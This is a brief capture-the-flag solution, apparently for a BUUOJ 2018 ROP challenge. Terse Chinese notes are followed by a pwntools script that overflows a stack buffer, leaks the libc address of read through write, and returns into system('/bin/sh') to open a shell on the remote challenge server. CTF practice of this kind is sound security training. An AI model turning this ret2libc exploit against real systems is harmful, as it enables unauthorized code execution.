铁人三项_第五赛区_2018_rop
查看保护
溢出,ret2libc
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27080)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
read_got = elf.got['read']
p1 = b'a' * (0x88 + 4) + p32(write_plt) + p32(main_addr)
p1 += p32(1) + p32(read_got) + p32(4)
r.sendline(p1)
read_addr = u32(r.recv(4))
success('read_addr = ' + hex(read_addr))
libc = ELF('./libc-2.27.so')
libc_base = read_addr - libc.sym['read']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
ret = 0x08048199
p2 = b'a' * (0x88 + 4) + p32(ret) + p32(system_addr) + p32(0)
p2 += p32(bin_sh)
r.sendline(p2)
r.interactive()